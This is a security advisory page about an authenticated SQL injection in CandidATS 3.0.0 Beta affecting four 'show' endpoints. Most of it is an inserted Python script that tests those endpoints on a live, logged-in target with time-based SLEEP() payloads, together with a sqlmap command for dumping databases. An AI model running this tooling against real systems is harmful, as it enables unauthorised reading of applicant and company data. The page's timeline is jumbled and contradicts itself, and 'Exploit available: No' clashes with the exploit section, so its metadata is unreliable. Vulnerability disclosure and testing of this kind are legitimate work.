CandidATS 3.0.0 - Authenticated SQL Injection
6.3
Medium
Discovered by
Offensive Team, Fluid Attacks
Summary
Full name
CandidATS 3.0.0 - Authenticated SQL Injection
Code name
State
Public
Release date
19 Jul 2022
Affected product
CandidATS
Affected version(s)
Version 3.0.0 Beta (Pilava Beta)
Vulnerability name
SQL injection
Vulnerability type
Remotely exploitable
Yes
CVSS v3.1 vector string
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CVSS v3.1 base score
6.3
Exploit available
No
CVE ID(s)
Description
CandidATS Version 3.0.0 Beta allows an authenticated user to inject SQL queries through the object-ID parameter of four "show" actions: /index.php?m=settings&a=show via the userID parameter, /index.php?m=candidates&a=show via the candidateID parameter, /index.php?m=joborders&a=show via the jobOrderID parameter, and /index.php?m=companies&a=show via the companyID parameter.
Proof of Concept
Log in to CandidATS with a user who has permission to read job orders, candidates or companies.
Go to index.php?m=joborders (or any of the other modules listed above) and uncheck the Only My Companies option.
Select any of the listed items and intercept the request with Burp Suite.
It is possible to inject SQL statements into the companyID parameter; for example, the following request makes the database sleep for 5 seconds.
Save the intercepted request to a file.
Run the following sqlmap command to extract information from the database.
Exploit
It is possible to use sqlmap in order to extract information from the database
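The check described in the proof of concept is a time-based blind test: the same "show" request is sent once with a plain numeric ID and once with a MySQL SLEEP() appended, and a response that arrives several seconds later confirms that the ID is concatenated into the query. The script below, written here as an added example (it is not Fluid Attacks' or CandidATS' code, and the exact request from the advisory is not reproduced on this page), applies that test to the four module/parameter pairs named in the description. The payload shape (`<id> AND SLEEP(<n>)`), the `make_http_sender` helper that needs the `requests` package plus an authenticated session cookie, and the simulated sender used for the offline run are all assumptions.

```python
"""Time-based blind SQL injection check for the four CandidATS 'show' endpoints."""
import time
from typing import Callable, Dict, Mapping

# (module, ID parameter) pairs named in the advisory's description.
INJECTION_POINTS: Dict[str, str] = {
    "settings": "userID",
    "candidates": "candidateID",
    "joborders": "jobOrderID",
    "companies": "companyID",
}

# A sender performs one authenticated GET of /index.php with the given query
# parameters. Only its wall-clock duration matters here, so it returns nothing.
Sender = Callable[[Mapping[str, str]], None]


def baseline_params(module: str, param: str, object_id: int) -> Dict[str, str]:
    """Query string of a normal request, e.g. m=companies&a=show&companyID=1."""
    return {"m": module, "a": "show", param: str(object_id)}


def sleep_params(module: str, param: str, object_id: int, delay: float) -> Dict[str, str]:
    """Same request with a MySQL SLEEP() appended to the numeric ID. This payload
    shape is an assumption: the advisory states the request sleeps for 5 s but
    the request itself is not reproduced on the page."""
    return {"m": module, "a": "show", param: f"{object_id} AND SLEEP({delay})"}


def _timed(send: Sender, params: Mapping[str, str]) -> float:
    t0 = time.monotonic()
    send(params)
    return time.monotonic() - t0


def is_time_blind_injectable(send: Sender, module: str, param: str,
                             object_id: int = 1, delay: float = 5.0) -> bool:
    """True when the SLEEP() request takes at least half the requested delay
    longer than the baseline request, so ordinary network jitter is ignored."""
    baseline = _timed(send, baseline_params(module, param, object_id))
    injected = _timed(send, sleep_params(module, param, object_id, delay))
    return injected - baseline >= delay / 2


def scan(send: Sender, delay: float = 5.0) -> Dict[str, bool]:
    """Run the check against every module/parameter pair from the advisory."""
    return {m: is_time_blind_injectable(send, m, p, delay=delay)
            for m, p in INJECTION_POINTS.items()}


def make_http_sender(base_url: str, cookies: Mapping[str, str]) -> Sender:
    """Sender for a live target (assumed helper): needs the 'requests' package and
    the cookies of a logged-in session. Imported lazily so the rest runs offline."""
    import requests
    session = requests.Session()
    session.cookies.update(cookies)

    def send(params: Mapping[str, str]) -> None:
        session.get(f"{base_url.rstrip('/')}/index.php", params=params, timeout=30)
    return send


def make_simulated_sender(vulnerable: bool) -> Sender:
    """Constructed stand-in for a CandidATS instance: the 'vulnerable' variant
    honours SLEEP() in any ID parameter, the patched variant ignores it."""
    def send(params: Mapping[str, str]) -> None:
        for key, value in params.items():
            if vulnerable and key in INJECTION_POINTS.values() and " AND SLEEP(" in value:
                seconds = float(value.split("SLEEP(")[1].rstrip(")"))
                time.sleep(seconds)
    return send


if __name__ == "__main__":
    # Offline demonstration with a short delay. Against a real install, build the
    # sender with make_http_sender(...) and keep the advisory's delay of 5 seconds.
    for label, flag in (("vulnerable", True), ("patched", False)):
        print(label, scan(make_simulated_sender(flag), delay=0.2))
```

Once one parameter is confirmed, the saved Burp request can be handed to sqlmap, which reads an HTTP request file with its `-r` option and can be pointed at one parameter with `-p` (for example `sqlmap -r request.txt -p companyID --dbs --batch`); this invocation is a typical one, not the command from the original advisory. The fix on the application side is the usual one for this bug class: cast the ID to an integer or bind it as a prepared-statement parameter instead of concatenating it into the SQL string.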
Mitigation
This information will be released later according to our Responsible Disclosure Policy.
References
Vendor page https://candidats.net/forums/
Timeline
19 Apr 2022
Vendor confirmed vuln.
20 Apr 2022
Vendor contacted
19 Apr 2022
Vendor replied
20 Apr 2022
Public disclosure
19 Jul 2022